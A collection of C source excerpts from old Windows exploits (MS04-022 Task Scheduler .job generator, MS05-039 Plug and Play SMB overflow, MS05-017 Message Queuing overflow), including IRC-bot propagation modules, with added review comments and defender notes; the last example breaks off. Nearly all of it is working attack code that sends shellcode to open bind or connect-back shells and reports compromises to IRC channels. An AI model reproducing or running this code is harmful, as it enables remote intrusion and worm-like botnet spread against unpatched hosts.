Example #1
/*
 * Generator for a Task Scheduler .job file that triggers MS04-022.
 *   argv[1]  output file path
 *   argv[2]  shellcode selector: 1 = portbind, 2 = connectback
 *   argv[3]  port
 *   argv[4]  connect-back IP (required only when argv[2] == 2)
 * Anything else goes to usage(), which is defined elsewhere in the file.
 * Layout written: the jobfile template at offset 0, the chosen shellcode
 * at offset 39*16 followed by endofjob, then a 2-byte length at offset 70.
 * Defender notes: this program only writes a file; it performs no network
 * activity. The artifact is the generated .job file itself, and the
 * MS04-022 update removes the parser flaw it relies on.
 * Every path exits with status 0, including the fopen() failure, so the
 * exit code never indicates an error. Numeric arguments go through atoi()
 * with no validation.
 */
int
main(int argc, char **argv)
{
	unsigned short strlen;	// NOTE(review): shadows libc strlen(); holds a 16-bit count, not a byte length
	unsigned short port;
	unsigned long ip, sc;
	FILE *fp, *fp2;		// NOTE(review): fp2 is never used

	printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n");
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n");

	if (argc < 4) usage(argv[0]);

	/* selector; only 1 and 2 are accepted, and 2 additionally needs argv[4] */
	sc = atoi(argv[2]);
	if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

	fp = fopen(argv[1], "wb");
	if (fp == NULL) {
		printf("[-] error: can\'t create file: %s\n", argv[1]);
		exit(0);	// NOTE(review): exit status 0 on failure
	}

	/* header & garbage */
	fwrite(jobfile, 1, sizeof(jobfile)-1, fp);	// return value unchecked
	fseek(fp, 39*16, SEEK_SET);			// shellcode is placed at offset 624

	port = atoi(argv[3]);	// unchecked; truncated to 16 bits
	printf("[*] Shellcode: ");
	if (sc == 1) {
		/* SET_PORTBIND_PORT is a macro defined elsewhere; it patches the port into portbindsc */
		SET_PORTBIND_PORT(portbindsc, htons(port));
		printf("Portbind, port = %u\n", port);
		fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
		fwrite(endofjob, 1, 4, fp);
		fseek(fp, 70, SEEK_SET);	// back to the 16-bit length field at offset 70
		/* calculate length (see header) */
		/* (bytes after offset 71) / 2 — presumably a UTF-16 character count; confirm against the .job format */
		strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
	}
	else {
		/* sc == 2: connect-back variant; argv[4] is parsed by inet_addr() with no error check */
		ip = inet_addr(argv[4]);
		SET_CONNECTBACK_IP(connectbacksc, ip);
		SET_CONNECTBACK_PORT(connectbacksc, htons(port));
		printf("Connectback, port = %u, IP = %s\n", port, argv[4]);
		fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
		fwrite(endofjob, 1, 4, fp);
		fseek(fp, 70, SEEK_SET);	// back to the 16-bit length field at offset 70
		/* calculate length (see header) */
		/* same formula as the portbind branch, sized for connectbacksc */
		strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
	}

	printf("[*] Generate file: %s\n", argv[1]);
	fwrite(&strlen, 1, 2, fp);	// written in host byte order (2 raw bytes of the unsigned short)
	fclose(fp);			// return value unchecked

return 0;
}
Example #2
/*
 * Bot exploit module for MS05-039 (Plug and Play service over SMB, TCP/445).
 * exinfo.ip is the target host; the bind port comes from the global
 * `xport`, which is defined elsewhere. Returns true only if ConnectShell2()
 * succeeds afterwards.
 * Wire sequence visible below: SMB Negotiate, SessionSetupAndX twice,
 * TreeConnectAndX to \\<ip>\IPC$, the browser pipe request, the PNP
 * endpoint bind, then a single 2196-byte request padded with 0x90.
 * Defender notes: the fixed-size 2196-byte request immediately after a
 * browser-pipe open is the step worth a detection rule; the MS05-039
 * update and filtering TCP/445 from untrusted networks are the mitigations.
 * Resource handling: the socket is never closed on any path in this
 * function. All printf()/IRC progress messages are commented out; the one
 * IRC message that remains (near the end) is sent from an uninitialised
 * buffer, so its content is whatever was on the stack.
 */
BOOL pnp(EXINFO exinfo)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];
    char buffer[IRCLINE];	// NOTE(review): never written in this function, but passed to irc_privmsg() below

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);	// return value unchecked
#endif

//	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
//	printf("\t         Universal Exploit + no crash shellcode\n\n\n");
//	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


//	if (exinfo.ip < 3) {
	//	printf("%s <host> <bind port>\n", argv[0]);
	//	exit(0);
// return false;
//	}

	/* name resolution; gethostbyname() is not thread-safe (static result) */
	if ((he = gethostbyname(exinfo.ip)) == NULL) {
	//	printf("[-] Unable to resolve %s\n", argv[1]);
	//	exit(0);
      return false;
	}

	/* NOTE(review): a socket() failure is not acted on here; the negative
	 * descriptor goes on to connect(), which is what then fails. */
	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
	//	printf("[-] socket failed\n");
	//	exit(0);

	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);	// SMB
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	//printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		//printf("\n[-] connect failed\n");
		//exit(0);
      return false;
	}
//	printf("ok\n");

//	printf("[*] null session...");
	/* SMB_Negotiate and the other SMB_* / RPC_* blobs are string constants defined elsewhere; sizeof()-1 drops the NUL */
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
 return false;
	}

	/* each reply is accepted if it is longer than 10 bytes and byte 9 is zero;
	 * only one recv() is done per step, so a split reply is treated as failure */
	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);
   return false;
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
    return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
	//	printf("\n[-] failed\n");
	//	exit(0);
    return false;
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
    return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		//printf("\n[-] failed\n");
	//	exit(0);
    return false;
	}

	/* build TreeConnectAndX for \\<ip>\IPC$ in packet[] */
	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	/* NOTE(review): unbounded sprintf() into tmp[1024]; safe only while exinfo.ip is short */
    sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip);
	convert_name((char*)ptr, (char*)tmp);	// defined elsewhere; from the *2 below it appears to widen the name to 2 bytes per char
	smblen = strlen((char*)tmp)*2;
	ptr += smblen;
	smblen += 9;
	/* one byte of smblen is patched into the header: the first byte in memory, i.e. the low byte on little-endian hosts */
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	/* NetBIOS session length field at packet[3]: total minus the 4-byte session header, low byte only */
	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) {

	//	printf("\n[-] send failed\n");
  // _snprintf(buffer, sizeof(buffer), "send failed");
  //  irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
     //_snprintf(buffer, sizeof(buffer), "failed");
   // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	//	exit(0);
return false;
	}

	//printf("ok\n");
//	printf("[*] bind pipe...");

   // _snprintf(buffer, sizeof(buffer), "Bind Pipe");
   //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		//printf("\n[-] send failed\n");


		return false;
	}

	/* NOTE(review): a failed reply here is not acted on — the block is empty and execution continues */
	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);


	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//_snprintf(buffer, sizeof(buffer), "send failed");
    //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		//exit(0);
     return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);
      return false;
	}

	//printf("ok\n");
//	printf("[*] sending crafted packet...");

   // _snprintf(buffer, sizeof(buffer), "sending craffted packet");
 //   irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

	// nop
	/* the whole 4096-byte buffer is filled with 0x90 before the pieces are laid over it */
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	/* xport is a global defined elsewhere; the port is stored XOR 0x0437,
	 * presumably matching a decode step inside bind_shellcode (not visible here) */
	bindport = xport;
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	/* trailer placed relative to the fixed 2196-byte request length */
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, (char*)packet, 2196, 0) < 0) {
	//	printf("\n[-] send failed\n");
    //_snprintf(buffer, sizeof(buffer), "send failed");
    //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		//exit(0);
		return false;
	}
//	printf("ok\n");
//	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

//    _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip);
	/* NOTE(review): the _snprintf() that filled buffer is commented out, so this
	 * reads an uninitialised char array — undefined behaviour, and the IRC message
	 * carries stack garbage (a useful forensic tell in channel logs) */
    irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
   // recv(sockfd, recvbuf, 4096, 0);
	/* stats counter is bumped before ConnectShell2() reports whether anything worked */
	exploit[exinfo.exploit].stats++;
	if (ConnectShell2(exinfo))
		return true;
        return false;
}
/*
 * Stand-alone command-line version of the MS05-039 (Plug and Play, TCP/445)
 * exploit: argv[1] = host, argv[2] = bind port (atoi, unchecked).
 * Same wire sequence as the bot module pnp(): Negotiate, two
 * SessionSetupAndX, TreeConnectAndX to \\<host>\IPC$, browser pipe
 * request, PNP endpoint bind, one 2196-byte request padded with 0x90.
 * Every failure prints a message and calls exit(0), so the exit status is
 * 0 whether or not anything was sent. The socket is never closed and the
 * final recv() result is ignored.
 * Defender notes: the MS05-039 update and filtering TCP/445 are the
 * mitigations; the 2196-byte request right after the browser pipe open
 * is the observable step.
 */
int
main (int argc, char **argv)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);	// return value unchecked
#endif

	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	printf("\t         Universal Exploit + no crash shellcode\n\n");
	printf("\t         [Spanish hack by RoMaNSoFt :-)]\n\n\n");
	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);	// SMB
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed\n");
		exit(0);
	}
	printf("ok\n");

	printf("[*] null session...");
	/* SMB_* and RPC_* blobs are string constants defined elsewhere; sizeof()-1 drops the NUL */
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	/* each reply is accepted if longer than 10 bytes with byte 9 == 0;
	 * one recv() per step, so a split reply counts as failure */
	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	/* build TreeConnectAndX for \\<host>\IPC$ in packet[] */
	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	/* NOTE(review): unbounded sprintf() of argv[1] into tmp[1024] */
	sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
	convert_name(ptr, tmp);	// defined elsewhere; the *2 below suggests it widens to 2 bytes per char
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	/* one byte of smblen is patched into the header: the first byte in memory, i.e. the low byte on little-endian hosts */
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	/* NetBIOS session length at packet[3]: total minus the 4-byte session header, low byte only */
	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, packet, ptr-packet, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] bind pipe...");

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] sending crafted packet...");

	// nop
	/* the whole 4096-byte buffer is filled with 0x90 before the pieces are laid over it */
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	/* port stored XOR 0x0437, presumably matching a decode step in bind_shellcode (not visible here) */
	bindport = (unsigned short)atoi(argv[2]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	/* trailer placed relative to the fixed 2196-byte request length */
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, packet, 2196, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}
	printf("ok\n");
	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

	recv(sockfd, recvbuf, 4096, 0);	// result ignored; socket is never closed

return 0;
}
Example #4
/*
 * Command-line driver for the MS05-017 (Message Queuing) overflow.
 *   argv[1] host   argv[2] port   argv[3] target NetBIOS name
 *   argv[4] bind port   argv[5] optional packet count (default 1)
 * Flow: DCE-RPC bind to the interface UUID in endp (built by
 * dce_rpc_bind(), defined elsewhere; the caller frees the result), one
 * reply read, then a 4172-byte request sent cpkt times.
 * Defender notes: the MS05-017 update is the fix; the usage text lists
 * the MSMQ ports (2103, 2105, 2107) worth restricting at the perimeter.
 * Resource handling: malloc() is unchecked, argv[3] is copied with no
 * length check, buff is never freed and the socket never closed (the
 * process exits right after). All failures exit(0).
 */
int
main (int argc, char **argv)
{

	unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";	// RPC interface UUID handed to dce_rpc_bind()
	unsigned char *packet = NULL;
	unsigned short bindport;
	unsigned long cnt;	// out-parameter: length of the bind packet
	struct sockaddr_in addr;
	struct hostent *he;
	int len, cpkt = 1;	// cpkt: how many times the 4172-byte request is sent
	int sockfd;
	char recvbuf[4096];
	char *buff, *ptr;
#ifdef _WIN32  
	WSADATA wsa;  
#endif  


	printf("\n      (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
	printf("\t     Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");


	if (argc < 5) {
		printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
		printf("\nMSMQ ports: 2103, 2105, 2107\n");
		printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
		exit(0);
	}

#ifdef _WIN32  
	WSAStartup(MAKEWORD(2,0), &wsa);  
#endif  

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		return 0;	// the only failure that returns instead of exit(0); same status either way
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] create socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons((short)atoi(argv[2]));	// unchecked
	addr.sin_addr = *((struct in_addr *)he->h_addr);  
	memset(&(addr.sin_zero), '\0', 8);

	printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed!\n");
		exit(0);
	}
	printf("OK\n");

	/* ownership: dce_rpc_bind() allocates, this function frees after the reply */
	packet = dce_rpc_bind(0, endp, 1, &cnt);

	if (send(sockfd, packet, cnt, 0) == -1) {
		printf("[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 0) {
		printf("[-] recv failed\n");
		exit(0);
	}
	free(packet);

	printf("[*] Attacking...");

	/* NOTE(review): malloc() result unchecked; NOP is a macro defined elsewhere */
	buff = (char *) malloc(4172);
	memset(buff, NOP, 4172);

	ptr = buff;
	memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
	ptr += sizeof(dce_rpc_header1)-1;

	// Remote NetBIOS name
	/* NOTE(review): no bound on strlen(argv[3]) against the 4172-byte buff; a long name overruns it */
	convert_name(ptr, argv[3]);
	ptr += strlen(argv[3])*2;

	memcpy(ptr, tag_private, sizeof(tag_private)-1);
	ptr += sizeof(tag_private)-1;

	/* fixed positions inside buff, written regardless of where ptr ended up */
	memcpy(buff+1048,   dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

	// offsets
	ptr = buff;
	ptr += 438;
	memcpy(ptr, offsets, sizeof(offsets)-1);
	ptr += sizeof(offsets)-1;

	// shellcode
	/* port stored XOR 0x0437, presumably matching a decode step in bind_shellcode (not visible here) */
	bindport = (unsigned short)atoi(argv[4]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	buff[4170] = '\0';
	buff[4171] = '\0';

	if (argc == 6) cpkt = atoi(argv[5]);	// unchecked; a negative value makes the loop below run very long

	while (cpkt--) {
		printf(".");
		if (send(sockfd, buff, 4172, 0) == -1) {
			printf("\n[-] send failed\n");
			exit(0);
		}
	}
	printf(" OK\n");


return 0;	// buff is not freed and sockfd not closed; process exit reclaims both
}
Example #5
/*
 * Bot-module port of the MS05-039 (Plug and Play) exploit. The target
 * host and port come from exinfo (the commented-out "445" messages are
 * left over from the stand-alone version; this one uses exinfo.port).
 * The f*-prefixed socket calls are wrappers defined elsewhere
 * (presumably resolved at run time — not visible here). Progress output
 * is replaced by one IRC message plus addlog() on success. Returns TRUE
 * only when ConnectShell2() succeeds.
 * Defender notes: the same wire sequence as the stand-alone tool
 * (Negotiate, two SessionSetupAndX, TreeConnectAndX to \\<ip>\IPC$,
 * browser pipe request, PNP endpoint bind, one 2196-byte request); the
 * MS05-039 update and filtering TCP/445 are the mitigations. The "[FTP]:
 * Transfer info sent" IRC message is a channel-log artifact.
 * The bind-port step below applies atoi() to the integer pport
 * reinterpreted as a pointer, which is undefined behaviour.
 */
BOOL
ppexploit (EXINFO exinfo)
//main (int argc, char **argv)
{
	int len;
	char buffer[IRCLINE];
	SOCKET sockfd;
	int pport = 7777;	// intended bind port; see the atoi() note below
	BOOL success = FALSE;	// NOTE(review): never read
	SOCKADDR_IN their_addr;
	memset(&their_addr, 0, sizeof(their_addr));
	//struct sockaddr_in addr;
	char recvbuf[4096];
//	struct hostent *he;
	unsigned short smblen;
	unsigned short bindport;
	char tmp[1024];
	char packet[4096];
	char *ptr;


/*	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);*/


	//printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	//printf("\t         Universal Exploit + no crash shellcode\n\n\n");
	//printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


/*	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}
*/
/*	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}
*/
	/* NOTE(review): if SOCKET is the Winsock unsigned typedef, `< 0` can never be
	 * true; the documented failure value is INVALID_SOCKET */
	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) {
		return FALSE;
	}
	their_addr.sin_family = AF_INET;
	their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); 	// no error check on the conversion
	their_addr.sin_port = fhtons((unsigned short)exinfo.port);
	
	/*addr.sin_family = AF_INET;
	addr.sin_port = fhtons((unsigned short)exinfo.port);
	addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/
	memset(&(their_addr.sin_zero), '\0', 8);



	//printf("\n[*] connecting to %s:445...", argv[1]);
	if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) {
		return FALSE;	// socket is not closed on this or any failure path below
	}
	//printf("ok\n");

	//printf("[*] null session...");
	/* SMB_* and RPC_* blobs are string constants defined elsewhere; sizeof()-1 drops the NUL */
	if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		return FALSE;
	}

	/* each reply is accepted if longer than 10 bytes with byte 9 == 0; one recv per step */
	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	/* build TreeConnectAndX for \\<ip>\IPC$ in packet[] */
	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	/* NOTE(review): unbounded sprintf() into tmp[1024]; safe only while exinfo.ip is short */
	sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip);
	convert_name(ptr, tmp);	// defined elsewhere; the *2 below suggests it widens to 2 bytes per char
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	/* one byte of smblen patched into the header: the first byte in memory, i.e. the low byte on little-endian hosts */
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	/* NetBIOS session length at packet[3]: total minus the 4-byte session header, low byte only */
	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (fsend(sockfd, packet, ptr-packet, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	//printf("ok\n");
	//printf("[*] bind pipe...");

	if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	//printf("ok\n");
	//printf("[*] sending crafted packet...");

	// nop
	/* the whole 4096-byte buffer is filled with 0x90 before the pieces are laid over it */
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	/* NOTE(review): pport is an int (7777) cast to a pointer, so atoi() reads
	 * memory at address 7777 — undefined behaviour, not a string conversion */
	bindport = (unsigned short)atoi((const char *)pport);
	bindport ^= 0x0437;	// presumably matches a decode step in bind_shellcode (not visible here)
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	/* trailer placed relative to the fixed 2196-byte request length */
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (fsend(sockfd, packet, 2196, 0) < 0) {
		return FALSE;
	}
//	printf("ok\n");
//	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
	frecv(sockfd, recvbuf, 4096, 0);	// result ignored
	Sleep(300);
	fclosesocket(sockfd);	// the only path that closes the socket
	if (ConnectShell2(exinfo)) {
		if(!exinfo.silent)
		{
			_snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip);
			irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
			addlog(buffer);
		}
		exploit[exinfo.exploit].stats++;
		return TRUE;
	}
return FALSE;
}
Example #6
/*
 * Bot-module port of the MS05-017 (Message Queuing) exploit. Bails out
 * at once if the fNetWkstaGetInfo function pointer (defined elsewhere) is
 * unset. Compared with the stand-alone driver: the target NetBIOS name
 * comes from GetRemoteComputerName(), the bind port is random (brandom),
 * and the packet count is picked from an OS fingerprint (FpHost): 8 for
 * OS_WIN2K, 1 for OS_WINXP, otherwise the default of 1.
 * Returns TRUE only when ConnectShellEx() succeeds.
 * Defender notes: the MS05-017 update is the fix; the request is the same
 * 4172-byte DCE-RPC payload as the stand-alone tool, sent to exinfo.port.
 * Resource handling is uneven: packet from dce_rpc_bind() is freed only
 * on the two early failure paths, buff is not freed on the send-failure
 * path, and the socket is closed only on the success path.
 * Declarations follow statements (the first `if` precedes them), so this
 * needs C99 or C++.
 */
BOOL MSMQ(EXINFO exinfo)
{
	if(!fNetWkstaGetInfo) { return FALSE; }
    char* cname;
    char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";	// RPC interface UUID handed to dce_rpc_bind()
    char *packet = NULL;
    unsigned short bindport;
